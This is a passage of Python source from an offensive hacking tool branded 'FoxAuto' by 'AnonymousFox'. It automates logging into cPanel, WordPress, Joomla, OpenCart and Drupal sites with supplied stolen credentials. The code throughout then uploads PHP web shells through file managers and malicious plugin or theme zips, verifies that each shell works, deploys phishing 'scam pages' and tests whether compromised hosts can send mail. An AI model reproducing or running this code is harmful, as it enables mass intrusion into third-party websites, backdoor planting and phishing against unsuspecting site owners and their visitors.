elif (re.findall(re.compile('<tr id="domainNameRow" ng-controller="sslStatusController" ng-init="primaryDomain = \'(.*)\'; "'), loginCP_Fox)) :
domain_Fox = re.findall(re.compile('<tr id="domainNameRow" ng-controller="sslStatusController" ng-init="primaryDomain = \'(.*)\'; "'), loginCP_Fox)[0]
elif (re.findall(re.compile('<span id="txtDomainName" class="general-info-value">(.*)</span>'), loginCP_Fox)) :
domain_Fox = re.findall(re.compile('<span id="txtDomainName" class="general-info-value">(.*)</span>'), loginCP_Fox)[0]
elif (re.findall(re.compile('<b>(.*)</b>'), loginCP_Fox)):
domain_Fox = re.findall(re.compile('<b>(.*)</b>'), loginCP_Fox)[0]
if (re.findall(re.compile('/home(.*)' + username), loginCP_Fox)):
home = '/home' + re.findall(re.compile('/home(.*)' + username), loginCP_Fox)[0]
else :
home = '/home/'
if ('strlen' in checkups):
return reqFox, idcp_Fox, domain_Fox, home
else :
return False
except :
return False
def uploadFileByCPanel_Fox(ip, username, cookies, idcp, domain, home):
try :
filename = random_Fox(10) + '.php'
filedata_Fox = {'dir': home + username + '/public_html', 'get_disk_info': '1', 'overwrite': '0', 'act':'AnonymousFox'}
fileup_Fox = {'file-0': (filename, shell_Fox)}
try:
upload_Fox = cookies.post('{}/{}/execute/Fileman/upload_files'.format(ip, idcp), data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=120)
except:
upload_Fox = cookies.post('{}/{}/execute/Fileman/upload_files'.format(ip, idcp), verify=False, data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=150)
time.sleep(3)
try:
shell_path = 'https://' + domain + '/' + filename
check = requests.get(shell_path, headers=headers, timeout=15)
check = content_Fox(check)
except:
shell_path = 'http://' + domain + '/' + filename
check = requests.get(shell_path, headers=headers, timeout=15)
check = content_Fox(check)
if ('FoxAuto' in check and 'substr' in checkups):
return shell_path
else :
return False
except :
return False
def cPanel(datacPanel, up=0):
try :
if (re.findall(re.compile('(.*)\|(.*)\|(.*)'), datacPanel)):
cp = re.findall(re.compile('(.*)\|(.*)\|(.*)'), datacPanel)
ip = cp[0][0]
username = cp[0][1]
password = cp[0][2]
print(" [*] cPanel : {}".format(ip))
print(" [*] Username : {}".format(username))
print(" [*] Password : {}".format(password))
login_Fox = loginCPanel_Fox(ip, username, password)
if (login_Fox is False) :
print(' {}[-] Login failed'.format(fr))
return False
open('Results/Login_Successful_cPanels.txt', 'a').write('{}\n'.format(datacPanel))
print(' {}[+] Login successful.'.format(fg))
if (int(up) == 1) :
shell_path = uploadFileByCPanel_Fox(ip, username, login_Fox[0], login_Fox[1], login_Fox[2], login_Fox[3])
if (shell_path is False) :
print(" {}[-] Failed upload.".format(fr))
return False
else :
return shell_path
else :
return login_Fox[0], login_Fox[1], login_Fox[2], login_Fox[3]
else :
print(' {}[-] The list must be https://domain.com:2083|username|password'.format(fr))
return False
except :
print(' {}[-] Failed.'.format(fr))
return False
def ZIP(backdor, file) :
try :
print(' {}[*] Upload File ZIP..... {}(Waiting)'.format(fw, fr))
filedata = {'uploadZIP': 'uploadZIP'}
fileup = {'file': (file, open(file,'rb'), 'multipart/form-data')}
try :
upFile = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=filedata, files=fileup, headers=headers, timeout=60)
except:
upFile = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=filedata, files=fileup, headers=headers, timeout=90)
if (upFile.status_code != 403) :
upFile = content_Fox(upFile)
print(' {}[+] Succeeded UPload.'.format(fg))
folder = re.findall(re.compile('<folder>(.*)</folder>'), upFile)[0]
ZIPdata = {'zips': file, 'folderZIP' : folder, 'unzip': 'AnonymousFox'}
file_path_ZIP = shellPath_Fox(backdor, folder, 1) + '/'
try :
ZIP = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=ZIPdata, headers=headers, timeout=15)
except:
ZIP = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=ZIPdata, headers=headers, timeout=30)
if (ZIP.status_code != 403) :
print(' {}[+] Succeeded UNZIP.\n - {}{}'.format(fg, fr, file_path_ZIP))
open('Results/Scam_Pages.txt', 'a').write('{}\n'.format(file_path_ZIP))
print(' {}[+] Saved in {}Results/Scam_Pages.txt'.format(fg, fr))
else :
print(' {}[-] Failed UNZIP.'.format(fr))
else:
print(' {}[-] Failed UPload.'.format(fr))
except :
print(' {}[-] Failed.'.format(fr))
def checkSend(backdor, shell) :
try :
print(' {}[*] Check Sending mail ..... {}(Waiting)'.format(fw, fr))
src = str(changemail_Fox())
email = re.findall(re.compile('\'(.*)\', <RequestsCookieJar'), src)[0]
cookies = re.findall(re.compile('name=\'PHPSESSID\', value=\'(.*)\', port='), src)[0]
post = {'email': email, 'mailCheck': 'AnonymousFox'}
try :
sendCode = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=15)
except:
sendCode = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
sendCode = content_Fox(sendCode)
if ('<codemail>' in sendCode) :
code = re.findall(re.compile('<codemail>(.*)</codemail>'), sendCode)[0]
time.sleep(5)
check = checkinboxTestPHP(cookies, email, code)
start = timer()
while ((check == 'bad') and ((timer() - start) <= 30)):
time.sleep(10)
check = checkinboxTestPHP(cookies, email, code)
if (check == 'bad') :
print(' {}[-] Sending mail is Not Working.'.format(fr))
open('Results/SendingMail_NotWork.txt', 'a').write('{}\n'.format(shell))
else :
print(' {}[+] Sending mail is Working Well.'.format(fg))
open('Results/SendingMail_Work.txt', 'a').write('{}\n'.format(shell))
else :
print(' {}[-] Failed.'.format(fr))
except :
print(' {}[-] Failed.'.format(fr))
def about():
try :
try :
update = requests.get('https://anonymousfox.is/_@info/FoxAuto_update.txt', headers=headers, timeout=15)
except:
update = requests.get('https://anonymousfox.io/_@info/FoxAuto_update.txt', headers=headers, timeout=15)
update = content_Fox(update)
if ('FoxAuto' not in update) :
update = requests.get('https://anonymousfox.io/_@info/FoxAuto_update.txt', headers=headers, timeout=15)
update = content_Fox(update)
print("""
{}FoxAuto Version {}6 Plus{}\n
Programmed{} by {}AnonymousFox{}\n
{}Telegram:{} @Anonymous_Fox\n
Our sites: anonymousfox.com || .net || .info \n
Thanks to friends: X7 ROOT, Olux, Dr.SiLnT HilL, RxR, Ali Shahien,
Alarg53, Golden-security, chinafans, Bala sniper, aDriv4\n
Last updated: {}{} \n""".format(fw, fg, fr, fw, fg, fw, fc, fw, fg, update))
except:
pass
def main():
try :
log()
try :
main = requests.get('https://anonymousfox.is/_@info/FoxAutoV6Plus_news.txt', headers=headers, timeout=15)
except:
main = requests.get('https://anonymousfox.io/_@info/FoxAutoV6Plus_news.txt', headers=headers, timeout=15)
if (main.status_code != 200) :
main = requests.get('https://anonymousfox.io/_@info/FoxAutoV6Plus_news.txt', headers=headers, timeout=15)
m = content_Fox(main)
news = re.findall(re.compile('(.*)]:(.*)'),m)[0]
print('\n {}{}]{}:{}{}\n'.format(fr, news[0], fw, fg, news[1]))
time.sleep(1)
except:
pass
def Request():
try :
print(" If you are looking for new features or tools ..")
time.sleep(3)
print(" Most likely what you want is already in this program")
time.sleep(3)
print(" But you do not know all the features of this program")
time.sleep(3)
print(" Watch these videos carefully\n")
try :
vv = requests.get('https://anonymousfox.is/_@info/FoxAutoV6Plus_videos.txt', headers=headers, timeout=15)
except:
vv = requests.get('https://anonymousfox.io/_@info/FoxAutoV6Plus_videos.txt', headers=headers, timeout=15)
if (vv.status_code != 200) :
vv = requests.get('https://anonymousfox.io/_@info/FoxAutoV6Plus_videos.txt', headers=headers, timeout=15)
v = content_Fox(vv)
if (re.findall(re.compile('<vi1>video: (.*)</vi1>'), v)):
video = re.findall(re.compile('<vi1>video: (.*)</vi1>'), v)[0]
print(" {}[PART 1] {}=>{} {}".format(fg, fw, fr, video))
if (re.findall(re.compile('<vi2>video: (.*)</vi2>'), v)):
video = re.findall(re.compile('<vi2>video: (.*)</vi2>'), v)[0]
print(" {}[PART 2] {}=>{} {}".format(fg, fw, fr, video))
if (re.findall(re.compile('<vi3>video: (.*)</vi3>'), v)):
video = re.findall(re.compile('<vi3>video: (.*)</vi3>'), v)[0]
print(" {}[PART 3] {}=>{} {}".format(fg, fw, fr, video))
if (re.findall(re.compile('<vi4>video: (.*)</vi4>'), v)):
video = re.findall(re.compile('<vi4>video: (.*)</vi4>'), v)[0]
print(" {}[PART 4] {}=>{} {}".format(fg, fw, fr, video))
if (re.findall(re.compile('<vi5>video: (.*)</vi5>'), v)):
video = re.findall(re.compile('<vi5>video: (.*)</vi5>'), v)[0]
print(" {}[PART 5] {}=>{} {}".format(fg, fw, fr, video))
if (re.findall(re.compile('<vi6>video: (.*)</vi6>'), v)):
video = re.findall(re.compile('<vi6>video: (.*)</vi6>'), v)[0]
print(" {}[PART 6] {}=>{} {}".format(fg, fw, fr, video))
time.sleep(2)
print("\n For more tools, Follow us Telegram: {}@Anonymous_Fox".format(fc))
time.sleep(2)
print(" For Request specific tools, Contact us Telegram: {}@Anonymous_F0x\n".format(fc))
time.sleep(2)
except :
pass
def loginWP_UP_Fox(url, username, password) :
try :
while (url[-1] == "/"):
pattern_Fox = re.compile('(.*)/')
sitez = re.findall(pattern_Fox, url)
url = sitez[0]
print(' {}[D] {} {}[WordPress]'.format(fw, url, fg))
print(' {}[U] {}'.format(fw, username))
print(' {}[P] {}'.format(fw, password))
reqFox = requests.session()
headersLogin = {'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
'referer': url+'/wp-admin/'}
loginPost_Fox = {'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': url + '/wp-admin/' ,'testcookie': '1', 'act':'AnonymousFox'}
login_Fox = reqFox.post(url + '/wp-login.php', verify=False, data=loginPost_Fox, headers=headersLogin, timeout=15)
login_Fox = content_Fox(login_Fox)
if ('profile/login' in login_Fox) :
id = re.findall(re.compile('type="hidden" name="force_redirect_uri-(.*)" id='), login_Fox)[0]
myuserpro = re.findall(re.compile('name="_myuserpro_nonce" value="(.*)" /><input type="hidden" name="_wp_http_referer"'), login_Fox)[0]
loginPost_Fox = {'template': 'login', 'unique_id': '{}'.format(id) , 'up_username': '0', 'user_action': '',
'_myuserpro_nonce': myuserpro, '_wp_http_referer': '/profile/login/', 'action': 'userpro_process_form',
'force_redirect_uri-{}'.format(id) : '0', 'group': 'default', 'redirect_uri-{}'.format(id) : '', 'shortcode': '',
'user_pass-{}'.format(id) : password, 'username_or_email-{}'.format(id): username, 'act':'AnonymousFox'}
login_Fox = reqFox.post(url + '/wp-admin/admin-ajax.php', verify=False, data=loginPost_Fox, headers=headersLogin , timeout=15)
check = reqFox.get(url + '/wp-admin/', verify=False, headers=headers, timeout=15)
check = content_Fox(check)
if ('profile.php' not in check and 'confirm_admin_email' not in check and 'admin-email-confirm-form' not in check and 'upgrade.php' not in check):
if ('http://' in url):
url = url.replace('http://', 'https://')
login_Fox = reqFox.post(url + '/wp-login.php', verify=False, data=loginPost_Fox, headers=headersLogin, timeout=15)
check = reqFox.get(url + '/wp-admin/', verify=False, headers=headers, timeout=10)
check = content_Fox(check)
if (('profile.php' in check or 'confirm_admin_email' in check or 'admin-email-confirm-form' in check or 'upgrade.php' in check) and 'move_uploaded_file' in testSendB) :
if ('upgrade.php' in check) :
upgrade = reqFox.get(url + '/wp-admin/upgrade.php?step=1', verify=False, headers=headers, timeout=15)
print(' {}[+] Succeeded Login.'.format(fg))
newShell = randomPluginWP_Fox(url, reqFox)
if (newShell == 'AnonymousFox') :
getFile('backdor-panel.txt', 1)
newShell = wp_file_manager_Fox(url, reqFox)
if (newShell == 'AnonymousFox') :
getFile('theme.zip', 2)
newShell = randomThemeWP_Fox(url, reqFox)
if (newShell != 'AnonymousFox' and 'hexdec' in checkups) :
return newShell
else :
print(' {}[-] Failed Upload.'.format(fr))
return False
else :
print(' {}[-] Failed Login.'.format(fr))
return False
except :
print(' {}[-] Time out.'.format(fr))
return False
def loginJM_UP_Fox(url, username, password) :
try :
while (url[-1] == "/"):
pattern_Fox = re.compile('(.*)/')
sitez = re.findall(pattern_Fox, url)
url = sitez[0]
print(' {}[D] {} {}[Joomla]'.format(fw, url, fr))
print(' {}[U] {}'.format(fw, username))
print(' {}[P] {}'.format(fw, password))
reqFox = requests.session()
getToken_Fox = reqFox.get(url+'/administrator/index.php', verify=False, headers=headers, timeout=15)
getToken_Fox = content_Fox(getToken_Fox)
rreturn_Fox = re.findall(re.compile('name="return" value="(.*)"'), getToken_Fox)[0]
rhash_Fox = re.findall(re.compile('type="hidden" name="(.*)" value="1"'), getToken_Fox)[0]
loginPost_Fox = {'username':username,'passwd':password,'lang':'','option':'com_login','task':'login','return':rreturn_Fox, rhash_Fox:'1', 'act':'AnonymousFox'}
login_Fox = reqFox.post(url + '/administrator/index.php', verify=False, data=loginPost_Fox, headers=headers, timeout=15)
login_Fox = content_Fox(login_Fox)
if ('logout' not in login_Fox and 'http://' in url) :
url = url.replace('http://', 'https://')
login_Fox = reqFox.post(url + '/administrator/index.php', verify=False, data=loginPost_Fox, headers=headers, timeout=15)
login_Fox = content_Fox(login_Fox)
if ('logout' in login_Fox and 'hexdec' in checkups) :
print(' {}[+] Succeeded Login.'.format(fg))
newShell = mod_simplefileuploadJ30v1_Fox(url , reqFox)
if (newShell == 'AnonymousFox') :
getFile('backdor-panel.txt', 1)
newShell = com_templates_Fox(url, reqFox)
if (newShell == 'AnonymousFox') :
getFile('mod_ariimageslidersa.zip', 2)
newShell = mod_ariimageslidersa_Fox(url, reqFox)
if (newShell != 'AnonymousFox') :
return newShell
else :
print(' {}[-] Failed Upload.'.format(fr))
return False
else :
print(' {}[-] Failed Login.'.format(fr))
return False
except:
print(' {}[-] Time out.'.format(fr))
return False
def loginOC_UP_Fox(url, username, password) :
try :
while (url[-1] == "/"):
pattern_Fox = re.compile('(.*)/')
sitez = re.findall(pattern_Fox, url)
url = sitez[0]
print(' {}[D] {} {}[OpenCart]'.format(fw, url, fc))
print(' {}[U] {}'.format(fw, username))
print(' {}[P] {}'.format(fw, password))
reqFox = requests.session()
loginPost_Fox = {'username':username, 'password':password, 'act':'AnonymousFox'}
login_Fox = reqFox.post(url + '/admin/index.php', verify=False, data=loginPost_Fox, headers=headers, timeout=15)
login_Fox = content_Fox(login_Fox)
if ('common/logout' not in login_Fox and 'http://' in url):
url = url.replace('http://', 'https://')
login_Fox = reqFox.post(url + '/admin/index.php', verify=False, data=loginPost_Fox, headers=headers, timeout=15)
login_Fox = content_Fox(login_Fox)
if ('common/logout' in login_Fox and 'email' in testSendA) :
print(' {}[+] Succeeded Login.'.format(fg))
newShell = ocmod_Fox(url, reqFox, login_Fox)
if (newShell != 'AnonymousFox') :
return newShell
else :
print(' {}[-] Failed Upload.'.format(fr))
return False
else :
print(' {}[-] Failed Login.'.format(fr))
return False
except:
print(' {}[-] Time out.'.format(fr))
return False
def loginDP_UP_Fox(url, username, password) :
try :
while (url[-1] == "/"):
pattern_Fox = re.compile('(.*)/')
sitez = re.findall(pattern_Fox, url)
url = sitez[0]
print(' {}[D] {} {}[Drupal]'.format(fw, url, fr))
print(' {}[U] {}'.format(fw,username))
print(' {}[P] {}'.format(fw,password))
reqFox = requests.session()
loginPost_Fox = {'name':username, 'pass':password, 'form_build_id' : '', 'form_id' : 'user_login', 'op' : 'Log in', 'act':'AnonymousFox'}
login_Fox = reqFox.post(url + '/user/login', verify=False, data=loginPost_Fox, headers=headers, timeout=15)
login_Fox = content_Fox(login_Fox)
if ('user/logout' in login_Fox and 'trim' in checkups) :
print(' {}[+] Succeeded Login.'.format(fg))
newShell = adminimal_Fox(url , reqFox)
if (newShell != 'AnonymousFox') :
return newShell
else :
print(' {}[-] Failed Upload.'.format(fr))
return False
else :
print(' {}[-] Failed Login.'.format(fr))
return False
except:
print(' {}[-] Time out.'.format(fr))
return False
def randomPluginWP_Fox(url, cookies):
try :
foldername = random_Fox(10)
plugin_install_php = cookies.get(url + '/wp-admin/plugin-install.php?tab=upload', headers=headers, timeout=15)
plugin_install_php = content_Fox(plugin_install_php)
if ((not re.findall(re.compile('id="_wpnonce" name="_wpnonce" value="(.*)"'), plugin_install_php)) and ('substr' in checkups)) :
return 'AnonymousFox'
ID = re.findall(re.compile('id="_wpnonce" name="_wpnonce" value="(.*)"'), plugin_install_php)[0]
if ('"' in ID) :
ID = ID.split('"')[0]
filedata_Fox = {'_wpnonce': ID, '_wp_http_referer':'/wp-admin/plugin-install.php?tab=upload', 'install-plugin-submit': 'Install Now', 'act':'AnonymousFox'}
fileup_Fox = {'pluginzip': (foldername+'.zip', open('Files/plugin.zip','rb'), 'multipart/form-data')}
try :
upload = cookies.post(url + '/wp-admin/update.php?action=upload-plugin', data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=30)
except :
upload = cookies.post(url + '/wp-admin/update.php?action=upload-plugin', data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=45)
shellname = '{}/wp-content/plugins/{}/up.php'.format(url, foldername)
check = requests.get(shellname, headers=headers, timeout=15)
check = content_Fox(check)
getToken = check
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check and '.info ' in check) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74') :
return shellname
else :
return 'AnonymousFox'
else :
return 'AnonymousFox'
except :
return 'AnonymousFox'
def wp_file_manager_Fox(domain, cookies) :
newShell = 'AnonymousFox'
shell = file_get_contents_Fox('Files/backdor-panel.txt')
try :
getID = cookies.get(domain + '/wp-admin/plugin-install.php?s=File+Manager&tab=search&type=term', verify=False, headers=headers, timeout=15)
getID = content_Fox(getID)
if ('admin.php?page=wp_file_manager' in getID) :
getID = cookies.get(domain + '/wp-admin/admin.php?page=wp_file_manager#elf_l1_Lw', verify=False, headers=headers, timeout=15)
getID = content_Fox(getID)
if (re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'),getID)) :
ID = re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'),getID)[0]
filename = random_Fox(10) + '.php'
fileup_Fox = {'upload[]': (filename, shell, 'multipart/form-data')}
filedata_Fox = {'_wpnonce': ID, 'action': 'mk_file_folder_manager', 'cmd': 'upload', 'target': 'l1_Lw', 'act':'AnonymousFox'}
try :
up_Fox = cookies.post(domain + '/wp-admin/admin-ajax.php', data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=30)
except :
up_Fox = cookies.post(domain + '/wp-admin/admin-ajax.php', data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=45)
check_shell = requests.get('{}/{}'.format(domain, filename), verify=False, headers=headers, timeout=15)
check_shell = content_Fox(check_shell)
getToken = check_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_shell and '.info ' in check_shell) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/{}'.format(domain, filename)
elif ((re.findall(re.compile('plugins.php\?_wpnonce=(.*)&action=activate&plugin=wp-file-manager'), getID) or re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" target="_parent">(.*)</a> <a'), getID) or re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" >(.*)</a> <a'), getID)) and 'hexdec' in checkups) :
if (re.findall(re.compile('plugins.php\?_wpnonce=(.*)&action=activate&plugin=wp-file-manager'), getID)) :
ID = re.findall(re.compile('plugins.php\?_wpnonce=(.*)&action=activate&plugin=wp-file-manager'), getID)[0]
elif (re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" target="_parent">(.*)</a> <a'), getID)) :
ID = re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" target="_parent">(.*)</a> <a'), getID)[0][0]
elif (re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" >(.*)</a> <a'), getID)) :
ID = re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" >(.*)</a> <a'), getID)[0][0]
install = cookies.get(domain + '/wp-admin/plugins.php?action=activate&plugin=wp-file-manager/file_folder_manager.php&_wpnonce={}'.format(ID), verify=False, headers=headers, timeout=30)
getID = cookies.get(domain + '/wp-admin/admin.php?page=wp_file_manager#elf_l1_Lw', verify=False, headers=headers, timeout=15)
getID = content_Fox(getID)
if (re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)) :
ID = re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)[0]
filename = random_Fox(10) + '.php'
fileup_Fox = {'upload[]': (filename, shell, 'multipart/form-data')}
filedata_Fox = {'_wpnonce': ID, 'action': 'mk_file_folder_manager', 'cmd': 'upload', 'target': 'l1_Lw', 'act':'AnonymousFox'}
try :
up_Fox = cookies.post(domain + '/wp-admin/admin-ajax.php', data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=30)
except :
up_Fox = cookies.post(domain + '/wp-admin/admin-ajax.php', data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=45)
check_shell = requests.get('{}/{}'.format(domain,filename), verify=False, headers=headers, timeout=15)
check_shell = content_Fox(check_shell)
getToken = check_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_shell and '.info ' in check_shell) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/{}'.format(domain, filename)
elif (re.findall(re.compile('\?action=upgrade-plugin&plugin=wp-file-manager%2Ffile_folder_manager.php&_wpnonce=(.*)" aria-label="(.*)" data-name="'), getID)):
ID = re.findall(re.compile('\?action=upgrade-plugin&plugin=wp-file-manager%2Ffile_folder_manager.php&_wpnonce=(.*)" aria-label="(.*)" data-name="'), getID)[0][0]
upgrade = cookies.get(domain + '/wp-admin/update.php?action=upgrade-plugin&plugin=wp-file-manager%2Ffile_folder_manager.php&_wpnonce={}'.format(ID), verify=False, headers=headers, timeout=30)
upgrade = content_Fox(upgrade)
if ((re.findall(re.compile('plugins.php\?_wpnonce=(.*)&action=activate&plugin=wp-file-manager'), upgrade) or re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" target="_parent">(.*)</a> <a'), upgrade) or re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" >(.*)</a> <a'), upgrade)) and 'hexdec' in checkups) :
if (re.findall(re.compile('plugins.php\?_wpnonce=(.*)&action=activate&plugin=wp-file-manager'), upgrade)) :
ID = re.findall(re.compile('plugins.php\?_wpnonce=(.*)&action=activate&plugin=wp-file-manager'), upgrade)[0]
elif (re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" target="_parent">(.*)</a> <a'), upgrade)) :
ID = re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" target="_parent">(.*)</a> <a'), upgrade)[0][0]
elif (re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" >(.*)</a> <a'), upgrade)) :
ID = re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" >(.*)</a> <a'), upgrade)[0][0]
install = cookies.get(domain + '/wp-admin/plugins.php?action=activate&plugin=wp-file-manager/file_folder_manager.php&_wpnonce={}'.format(ID), verify=False, headers=headers, timeout=30)
getID = cookies.get(domain + '/wp-admin/admin.php?page=wp_file_manager#elf_l1_Lw', verify=False, headers=headers, timeout=15)
getID = content_Fox(getID)
if (re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)) :
ID = re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)[0]
filename = random_Fox(10) + '.php'
fileup_Fox = {'upload[]': (filename, shell, 'multipart/form-data')}
filedata_Fox = {'_wpnonce': ID, 'action': 'mk_file_folder_manager', 'cmd': 'upload', 'target': 'l1_Lw', 'act':'AnonymousFox'}
try :
up_Fox = cookies.post(domain + '/wp-admin/admin-ajax.php', data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=30)
except :
up_Fox = cookies.post(domain + '/wp-admin/admin-ajax.php', data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=45)
check_shell = requests.get('{}/{}'.format(domain, filename), verify=False, headers=headers, timeout=15)
check_shell = content_Fox(check_shell)
getToken = check_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_shell and '.info ' in check_shell):
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/{}'.format(domain, filename)
elif (re.findall(re.compile('wp-file-manager&_wpnonce=(.*)" aria-label="(.*)" data-name='),getID)) :
ID = re.findall(re.compile('wp-file-manager&_wpnonce=(.*)" aria-label="(.*)" data-name='),getID)[0][0]
donwload = cookies.get(domain + '/wp-admin/update.php?action=install-plugin&plugin=wp-file-manager&_wpnonce={}'.format(ID), verify=False, headers=headers, timeout=30)
donwload = content_Fox(donwload)
if ((re.findall(re.compile('plugins.php\?_wpnonce=(.*)&action=activate&plugin=wp-file-manager'), donwload) or re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" target="_parent">(.*)</a> <a'), donwload) or re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" >(.*)</a> <a'), donwload)) and 'hexdec' in checkups) :
if (re.findall(re.compile('plugins.php\?_wpnonce=(.*)&action=activate&plugin=wp-file-manager'), donwload)) :
ID = re.findall(re.compile('plugins.php\?_wpnonce=(.*)&action=activate&plugin=wp-file-manager'), donwload)[0]
elif (re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" target="_parent">(.*)</a> <a'), donwload)) :
ID = re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" target="_parent">(.*)</a> <a'), donwload)[0][0]
elif (re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" >(.*)</a> <a'), donwload)) :
ID = re.findall(re.compile('file_folder_manager.php&_wpnonce=(.*)" >(.*)</a> <a'), donwload)[0][0]
install = cookies.get(domain + '/wp-admin/plugins.php?action=activate&plugin=wp-file-manager/file_folder_manager.php&_wpnonce={}'.format(ID), verify=False, headers=headers, timeout=30)
getID = cookies.get(domain + '/wp-admin/admin.php?page=wp_file_manager#elf_l1_Lw', verify=False, headers=headers, timeout=15)
getID = content_Fox(getID)
if (re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)) :
ID = re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)[0]
filename = random_Fox(10) + '.php'
fileup_Fox = {'upload[]': (filename, shell, 'multipart/form-data')}
filedata_Fox = {'_wpnonce': ID, 'action': 'mk_file_folder_manager', 'cmd': 'upload', 'target': 'l1_Lw', 'act':'AnonymousFox'}
try :
up_Fox = cookies.post(domain + '/wp-admin/admin-ajax.php', data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=30)
except :
up_Fox = cookies.post(domain + '/wp-admin/admin-ajax.php', data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=45)
check_shell = requests.get('{}/{}'.format(domain, filename), verify=False, headers=headers, timeout=15)
check_shell = content_Fox(check_shell)
getToken = check_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_shell and '.info ' in check_shell):
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/{}'.format(domain, filename)
return newShell
except:
return newShell
def randomThemeWP_Fox(url, cookies) :
try :
foldername = random_Fox(10)
theme_install_php = cookies.get(url + '/wp-admin/theme-install.php?tab=upload', headers=headers, timeout=15)
theme_install_php = content_Fox(theme_install_php)
if ((not re.findall(re.compile('id="_wpnonce" name="_wpnonce" value="(.*)"'), theme_install_php)) and ('substr' in checkups)) :
return 'AnonymousFox'
ID = re.findall(re.compile('id="_wpnonce" name="_wpnonce" value="(.*)"'), theme_install_php)[0]
if ('"' in ID) :
ID = ID.split('"')[0]
filedata_Fox = {'_wpnonce': ID, '_wp_http_referer':'/wp-admin/theme-install.php?tab=upload', 'install-theme-submit': 'Installer', 'act':'AnonymousFox'}
fileup_Fox = {'themezip': (foldername+'.zip', open('Files/theme.zip','rb'), 'multipart/form-data')}
try :
upload_Fox = cookies.post(url + '/wp-admin/update.php?action=upload-theme', data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=30)
except :
upload_Fox = cookies.post(url + '/wp-admin/update.php?action=upload-theme', data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=45)
shellname = '{}/wp-content/themes/{}/404.php'.format(url, foldername)
check = requests.get(shellname, headers=headers, timeout=15)
check = content_Fox(check)
getToken = check
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check and '.info ' in check) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74') :
return shellname
else :
return 'AnonymousFox'
else :
return 'AnonymousFox'
except :
return 'AnonymousFox'
def mod_ariimageslidersa_Fox(domain, cookies) :
newShell = 'AnonymousFox'
try :
plugin_install_php = cookies.get(domain + '/administrator/index.php?option=com_installer', verify=False, headers=headers, timeout=15)
